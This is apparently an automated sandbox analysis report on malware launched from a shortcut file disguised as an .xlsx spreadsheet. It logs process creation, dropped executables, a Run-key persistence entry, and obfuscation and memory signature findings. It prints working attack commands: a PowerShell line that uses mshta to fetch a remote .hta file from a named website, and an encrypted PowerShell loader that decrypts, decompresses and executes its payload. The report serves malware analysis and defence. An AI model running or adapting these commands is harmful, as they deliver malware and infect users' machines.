Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32 Jump to behavior
Source: FT. 40FE CNY .xlsx.lnk LNK file: ..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles Jump to behavior
Source: Binary string: calc.pdbGCTL source: mshta.exe, 00000009.00000003.1852414679.0000019AC1771000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1855006902.000001A2C46D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852363981.000001A2C46CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1863703689.0000019AC1772000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852558870.000001A2C46E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852439079.000001A2C46DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1851615477.000001A2C4722000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852067245.000001A2C4393000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1865516494.000001A2C46F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852507533.000001A2C4710000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852261324.000001A2C46D5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852234112.000001A2C438F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852117667.0000019AC1757000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1851691454.000001A2C438D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1853065476.000001A2C46E5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1865380060.000001A2C46D1000.00000004.00000020.00020000.00000000.sdmp, yt[1].hta.9.dr
Source: Binary string: PSReadline.pdbaK source: powershell.exe, 00000011.00000002.1635136687.0000029E326E4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000011.00000002.1629294581.0000029E323A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdb source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp, easinvoker.exe.19.dr
Source: Binary string: _.pdb source: bwsiuvcU.pif, 00000017.00000002.1680345757.000000003DA95000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000003.1516343993.000000003BDC9000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1681909755.0000000040260000.00000004.08000000.00040000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1681582310.000000003EDE1000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1787983024.0000000025D95000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1791650361.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000003.1634916828.0000000023FF4000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1790805820.0000000026F71000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2555827704.0000000040350000.00000004.08000000.00040000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000003.1719620200.000000003BD8F000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2554498447.000000003DA65000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2555544877.000000003ED31000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: calc.pdb source: mshta.exe, 00000009.00000003.1852414679.0000019AC1771000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1855006902.000001A2C46D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852363981.000001A2C46CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1863703689.0000019AC1772000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852067245.000001A2C4393000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852117667.0000019AC1757000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1851691454.000001A2C438D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1865380060.000001A2C46D1000.00000004.00000020.00020000.00000000.sdmp, yt[1].hta.9.dr
Source: Binary string: easinvoker.pdbH source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1514685918.0000000014B20000.00000004.00000020.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp, easinvoker.exe.19.dr
Source: Binary string: owershell.PSReadline.pdb source: powershell.exe, 00000011.00000002.1629294581.0000029E32432000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Users\Public\Libraries\bwsiuvcU.pif Unpacked PE file: 23.2.bwsiuvcU.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Unpacked PE file: 25.2.bwsiuvcU.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Unpacked PE file: 27.2.bwsiuvcU.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Unpacked PE file: 23.2.bwsiuvcU.pif.400000.0.unpack
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Unpacked PE file: 25.2.bwsiuvcU.pif.400000.0.unpack
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Unpacked PE file: 27.2.bwsiuvcU.pif.400000.0.unpack
Source: Yara match File source: 19.2.uc.exe.2980000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001A.00000002.1728089924.0000000002831000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.1499010628.0000000002385000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.1438376010.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.1636496572.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: 23.2.bwsiuvcU.pif.3ee39b90.4.raw.unpack, wrQqF835PFmCSFtGtO.cs .Net Code: Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777263)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777238)),Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777265))})
Source: 23.2.bwsiuvcU.pif.40260f08.7.raw.unpack, wrQqF835PFmCSFtGtO.cs .Net Code: Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777263)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777238)),Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777265))})
Source: 23.2.bwsiuvcU.pif.3dad646e.2.raw.unpack, wrQqF835PFmCSFtGtO.cs .Net Code: Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777263)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777238)),Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777265))})
Source: 23.2.bwsiuvcU.pif.3ede6478.5.raw.unpack, wrQqF835PFmCSFtGtO.cs .Net Code: Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777263)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777238)),Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777265))})
Source: 23.2.bwsiuvcU.pif.409c0000.8.raw.unpack, wrQqF835PFmCSFtGtO.cs .Net Code: Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777263)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777238)),Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777265))})
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($JIfveZK);$VpSlE = [System.Convert]::FromBase64String($OsFNkdw);$uBmStTPL = $VpSlE[0..15];$UGIWRBAh.IV = $uBmStTPL;$cLYZAvcnc = $UGIWRBAh.CreateDecryptor();$eVtPpVFwq = $cLYZAvcnc.Tra
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" .(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')https://www.sessosesso.it/assets/aw/yt.hta
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $OsFNkdw = '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';$JIfveZK = 'cFRkUGZlWWl4R2ZHdlp1WlRocFlZR3RFVUtmamhETUc=';$UGIWRBAh = New-Object 'System.Security.Cryptography.AesManaged';$UGIWRBAh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$UGIWRBAh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$UGIWRBAh.BlockSize = 128;$UGIWRBAh.KeySize = 256;$UGIWRBAh.Key = [System.Convert]::FromBase64String($JIfveZK);$VpSlE = [System.Convert]::FromBase64String($OsFNkdw);$uBmStTPL = $VpSlE[0..15];$UGIWRBAh.IV = $uBmStTPL;$cLYZAvcnc = $UGIWRBAh.CreateDecryptor();$eVtPpVFwq = $cLYZAvcnc.TransformFinalBlock($VpSlE, 16, $VpSlE.Length - 16);$UGIWRBAh.Dispose();$DaRjcu = New-Object System.IO.MemoryStream( , $eVtPpVFwq );$wDjFzJY = New-Object System.IO.MemoryStream;$MtMSBjEhy = New-Object System.IO.Compression.GzipStream $DaRjcu, ([IO.Compression.CompressionMode]::Decompress);$MtMSBjEhy.CopyTo( $wDjFzJY );$MtMSBjEhy.Close();$DaRjcu.Close();[byte[]] $dVtmfGSE = $wDjFzJY.ToArray();$ghWDGW = [System.Text.Encoding]::UTF8.GetString($dVtmfGSE);$ghWDGW | powershell -
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $OsFNkdw = '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';$JIfveZK = 'cFRkUGZlWWl4R2ZHdlp1WlRocFlZR3RFVUtmamhETUc=';$UGIWRBAh = New-Object 'System.Security.Cryptography.AesManaged';$UGIWRBAh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$UGIWRBAh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$UGIWRBAh.BlockSize = 128;$UGIWRBAh.KeySize = 256;$UGIWRBAh.Key = [System.Convert]::FromBase64String($JIfveZK);$VpSlE = [System.Convert]::FromBase64String($OsFNkdw);$uBmStTPL = $VpSlE[0..15];$UGIWRBAh.IV = $uBmStTPL;$cLYZAvcnc = $UGIWRBAh.CreateDecryptor();$eVtPpVFwq = $cLYZAvcnc.TransformFinalBlock($VpSlE, 16, $VpSlE.Length - 16);$UGIWRBAh.Dispose();$DaRjcu = New-Object System.IO.MemoryStream( , $eVtPpVFwq );$wDjFzJY = New-Object System.IO.MemoryStream;$MtMSBjEhy = New-Object System.IO.Compression.GzipStream $DaRjcu, ([IO.Compression.CompressionMode]::Decompress);$MtMSBjEhy.CopyTo( $wDjFzJY );$MtMSBjEhy.Close();$DaRjcu.Close();[byte[]] $dVtmfGSE = $wDjFzJY.ToArray();$ghWDGW = [System.Text.Encoding]::UTF8.GetString($dVtmfGSE);$ghWDGW | powershell - Jump to behavior
Source: bwsiuvcU.pif.19.dr Static PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]
Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_02997AC0 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary, 19_2_02997AC0
Source: easinvoker.exe.19.dr Static PE information: section name: .imrsiv
Source: netutils.dll.19.dr Static PE information: section name: .xdata
Source: netutils.dll.19.dr Static PE information: section name: /4
Source: netutils.dll.19.dr Static PE information: section name: /19
Source: netutils.dll.19.dr Static PE information: section name: /31
Source: netutils.dll.19.dr Static PE information: section name: /45
Source: netutils.dll.19.dr Static PE information: section name: /57
Source: netutils.dll.19.dr Static PE information: section name: /70
Source: netutils.dll.19.dr Static PE information: section name: /81
Source: netutils.dll.19.dr Static PE information: section name: /92
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_00007FFAAB95FB5D push esp; retf 17_2_00007FFAAB95FB5E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_00007FFAAB958167 push ebx; ret 17_2_00007FFAAB95816A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_00007FFAAB9584E1 push es; ret 17_2_00007FFAAB9584E2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_00007FFAAB950CCE pushad ; retf 17_2_00007FFAAB950D3D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_00007FFAABA244B4 push cs; ret 17_2_00007FFAABA244B6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_00007FFAABA2433D push cs; ret 17_2_00007FFAABA2433F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_00007FFAABA24390 push cs; ret 17_2_00007FFAABA24392
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_00007FFAABA242E8 push cs; ret 17_2_00007FFAABA242EA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_00007FFAABA24209 push cs; ret 17_2_00007FFAABA24232
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_00007FFAABA2914E push ss; ret 17_2_00007FFAABA2914F
Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_029832F0 push eax; ret 19_2_0298332C
Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_029AA2F4 push 029AA35Fh; ret 19_2_029AA357
Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_0299D20C push ecx; mov dword ptr [esp], edx 19_2_0299D211
Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_02986372 push 029863CFh; ret 19_2_029863C7
Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_02986374 push 029863CFh; ret 19_2_029863C7
Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_029AA0AC push 029AA125h; ret 19_2_029AA11D
Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_02993028 push 02993075h; ret 19_2_0299306D
Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_02993027 push 02993075h; ret 19_2_0299306D
Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_029AA1F8 push 029AA288h; ret 19_2_029AA280
Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_029AA144 push 029AA1ECh; ret 19_2_029AA1E4
Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_0298673E push 02986782h; ret 19_2_0298677A
Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_02986740 push 02986782h; ret 19_2_0298677A
Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_0298C528 push ecx; mov dword ptr [esp], edx 19_2_0298C52D
Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_0298D55C push 0298D588h; ret 19_2_0298D580
Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_0298CBA8 push 0298CD2Eh; ret 19_2_0298CD26
Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_02999B58 push 02999B90h; ret 19_2_02999B88
Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_029A9B70 push 029A9D8Eh; ret 19_2_029A9D86
Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_0298C8D6 push 0298CD2Eh; ret 19_2_0298CD26
Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_029978C8 push 02997945h; ret 19_2_0299793D
Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_02996902 push 029969AFh; ret 19_2_029969A7
Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_02996904 push 029969AFh; ret 19_2_029969A7
Source: 23.2.bwsiuvcU.pif.3ee39b90.4.raw.unpack, wrQqF835PFmCSFtGtO.cs High entropy of concatenated method names: 'ICAyBoI8nQ', 'KDikMXewCI', 'L8eyiSD8RZ', 'NWhy3UvHJp', 'hrcyqFProH', 'xbkytiDasQ', 'cE1voes021ZUN', 'ErtcfHgK7I', 'NFQcC8bA4F', 'TE6czWL5Zk'
Source: 23.2.bwsiuvcU.pif.40260f08.7.raw.unpack, wrQqF835PFmCSFtGtO.cs High entropy of concatenated method names: 'ICAyBoI8nQ', 'KDikMXewCI', 'L8eyiSD8RZ', 'NWhy3UvHJp', 'hrcyqFProH', 'xbkytiDasQ', 'cE1voes021ZUN', 'ErtcfHgK7I', 'NFQcC8bA4F', 'TE6czWL5Zk'
Source: 23.2.bwsiuvcU.pif.3dad646e.2.raw.unpack, wrQqF835PFmCSFtGtO.cs High entropy of concatenated method names: 'ICAyBoI8nQ', 'KDikMXewCI', 'L8eyiSD8RZ', 'NWhy3UvHJp', 'hrcyqFProH', 'xbkytiDasQ', 'cE1voes021ZUN', 'ErtcfHgK7I', 'NFQcC8bA4F', 'TE6czWL5Zk'
Source: 23.2.bwsiuvcU.pif.3ede6478.5.raw.unpack, wrQqF835PFmCSFtGtO.cs High entropy of concatenated method names: 'ICAyBoI8nQ', 'KDikMXewCI', 'L8eyiSD8RZ', 'NWhy3UvHJp', 'hrcyqFProH', 'xbkytiDasQ', 'cE1voes021ZUN', 'ErtcfHgK7I', 'NFQcC8bA4F', 'TE6czWL5Zk'
Source: 23.2.bwsiuvcU.pif.409c0000.8.raw.unpack, wrQqF835PFmCSFtGtO.cs High entropy of concatenated method names: 'ICAyBoI8nQ', 'KDikMXewCI', 'L8eyiSD8RZ', 'NWhy3UvHJp', 'hrcyqFProH', 'xbkytiDasQ', 'cE1voes021ZUN', 'ErtcfHgK7I', 'NFQcC8bA4F', 'TE6czWL5Zk'

Persistence and Installation Behavior

Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file Process created: C:\Windows\System32\mshta.exe
Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file Process created: C:\Windows\SysWOW64\cmd.exe
Source: LNK file Process created: C:\Windows\System32\mshta.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Jump to behavior
Source: LNK file Process created: C:\Windows\SysWOW64\cmd.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe File created: C:\Users\Public\Libraries\bwsiuvcU.pif Jump to dropped file
Source: C:\Windows\SysWOW64\extrac32.exe File created: C:\Users\Public\Libraries\Ucvuiswb.PIF Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\uc.exe Jump to dropped file
Source: C:\Users\user\AppData\Roaming\uc.exe File created: C:\Users\Public\Libraries\easinvoker.exe Jump to dropped file
Source: C:\Users\user\AppData\Roaming\uc.exe File created: C:\Users\Public\Libraries\netutils.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\uc.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Ucvuiswb Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_02999B94 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 19_2_02999B94
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX (26 identical entries in this block)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (184 identical entries in this block)
Source: C:\Users\user\AppData\Roaming\uc.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX (45 identical entries in this block)
Source: C:\Users\user\AppData\Roaming\uc.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
